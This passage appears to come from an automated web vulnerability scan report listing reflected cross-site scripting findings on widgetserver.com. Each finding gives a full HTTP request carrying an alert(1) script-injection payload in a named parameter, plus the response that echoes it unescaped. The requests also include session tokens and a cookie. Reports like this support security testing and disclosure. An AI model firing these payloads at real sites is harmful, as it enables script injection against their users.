Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; node=1025; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.2.10.1303854385

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:46:17 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Set-Cookie: node=1025; path=/
Connection: close
Content-Type: text/javascript

frontDoorStats87793<script>alert(1)</script>1ab895c59aa({"percentChangeOfWidgetsphere":0,"search":"/Stats","caffeineIdx":0.8000000000000000444089209850062616169452667236328125,"domainsWidgetized":8222145,"numWidgets":238505,"hitStats":{"dayWidgetHits":2961
...[SNIP]...

5.231. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [lib.mobileCssSrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetserver.com
Path:   /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe

Issue detail

The value of the lib.mobileCssSrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c95c"><script>alert(1)</script>87c8ce80013687705 was submitted in the lib.mobileCssSrc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css2c95c"><script>alert(1)</script>87c8ce80013687705&wbxPagePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.widgetbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:48:23 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sun, 7 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-UA-Compatible: chrome=1
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15165

<!DOCTYPE html>
<html>
<head>
<title>New App</title>
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"/>
<meta name="apple-mobile-web-app-capab
...[SNIP]...
<link rel="stylesheet" href="http://cdn.widgetserver.com/syndication/mobile/x/css/preview.css2c95c"><script>alert(1)</script>87c8ce80013687705?48996" />
...[SNIP]...

5.232. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [lib.mobileScriptSrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetserver.com
Path:   /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe

Issue detail

The value of the lib.mobileScriptSrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a27f"><script>alert(1)</script>6e298833ab3d61a5d was submitted in the lib.mobileScriptSrc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js1a27f"><script>alert(1)</script>6e298833ab3d61a5d&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.widgetbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:48:30 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sun, 7 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-UA-Compatible: chrome=1
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15165

<!DOCTYPE html>
<html>
<head>
<title>New App</title>
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"/>
<meta name="apple-mobile-web-app-capab
...[SNIP]...
<script src="http://cdn.widgetserver.com/syndication/mobilejs/mapp_future.js1a27f"><script>alert(1)</script>6e298833ab3d61a5d?48996">
...[SNIP]...

5.233. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [pages parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetserver.com
Path:   /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe

Issue detail

The value of the pages request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4dfe5%3balert(1)//bec5e8a4925e26aae was submitted in the pages parameter. This input was echoed as 4dfe5;alert(1)//bec5e8a4925e26aae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D4dfe5%3balert(1)//bec5e8a4925e26aae&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.widgetbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:48:25 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sun, 7 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-UA-Compatible: chrome=1
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15273

<!DOCTYPE html>
<html>
<head>
<title>New App</title>
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"/>
<meta name="apple-mobile-web-app-capab
...[SNIP]...
"http://l.wbx.me/l/",
metricsUrl: "http://t.widgetserver.com/t",
mobileAppRuntimeUrl: "http://wbxapp.com/",
pages: []4dfe5;alert(1)//bec5e8a4925e26aae,
partnerNetworkPk: "80",
providerPk: "1860293",
providerServiceLevel: parseInt("2"),
proxyUrl: "http://p.widgetser
...[SNIP]...

5.234. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [siteConfig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetserver.com
Path:   /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe

Issue detail

The value of the siteConfig request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e0f6b%3balert(1)//b7e51f302787001e0 was submitted in the siteConfig parameter. This input was echoed as e0f6b;alert(1)//b7e51f302787001e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7De0f6b%3balert(1)//b7e51f302787001e0&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.widgetbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:48:20 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sun, 7 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-UA-Compatible: chrome=1
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11098

<!DOCTYPE html>
<html>
<head>
<title>New App</title>
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"/>
<meta name="apple-mobile-web-app-capab
...[SNIP]...
ns-serif","secondary":"sans-serif","titleColor":"","primaryColor":"","secondaryColor":"","title":"sans-serif"},"admobAcct":"","showAds":"false","showInstallTip":"true","pageConfigs":[],"themeImage":""}e0f6b;alert(1)//b7e51f302787001e0;

WIDGETBOX.globals.token = "34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211";

Wbx.apply(Wbx.app, {
appProductLevels: {
CNAME: 3,
PREMIUM_METRICS: 2,
PREM
...[SNIP]...

5.235. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [wbxPageTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.widgetserver.com
Path:   /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe

Issue detail

The value of the wbxPageTitle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f3c8"%3balert(1)//c8b66430a224ecbcd was submitted in the wbxPageTitle parameter. This input was echoed as 3f3c8";alert(1)//c8b66430a224ecbcd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830&siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22bottomNav%22%2C%22aboutImg%22%3A%22%22%2C%22aboutText%22%3A%22Made+with+Widgetbox+Mobile.%22%2C%22titleStyle%22%3A%22siteTitleText%22%2C%22titleImg%3A%22%3A%22%22%2C%22themeColor%22%3A%22%22%2C%22theme%22%3A%2201%22%2C%22themeGuid%22%3A%226f55c53b-4089-4776-bcb9-135b52609c75%22%2C%22font%22%3A%7B%22primary%22%3A%22sans-serif%22%2C%22secondary%22%3A%22sans-serif%22%2C%22titleColor%22%3A%22%22%2C%22primaryColor%22%3A%22%22%2C%22secondaryColor%22%3A%22%22%2C%22title%22%3A%22sans-serif%22%7D%2C%22admobAcct%22%3A%22%22%2C%22showAds%22%3A%22false%22%2C%22showInstallTip%22%3A%22true%22%2C%22pageConfigs%22%3A%5B%5D%2C%22themeImage%22%3A%22%22%7D&vars=&lib.mobileCssSrc=%2Fmobile%2Fx%2Fcss%2Fpreview.css&wbxPagePath=&pages=%5B%5D&isInstallable=true&pageIds=%5B%5D&wbxPageTitle=New+App3f3c8"%3balert(1)//c8b66430a224ecbcd&lib.mobileScriptSrc=%2Fmobilejs%2Fmapp_future.js&wbx_in_editor=%5Bobject+Object%5D&__cb=1303854400438&widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile+Web+App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%29+applewebkit%2F534.16+%28khtml%2C+like+gecko%29+chrome%2F10.0.648.205+safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.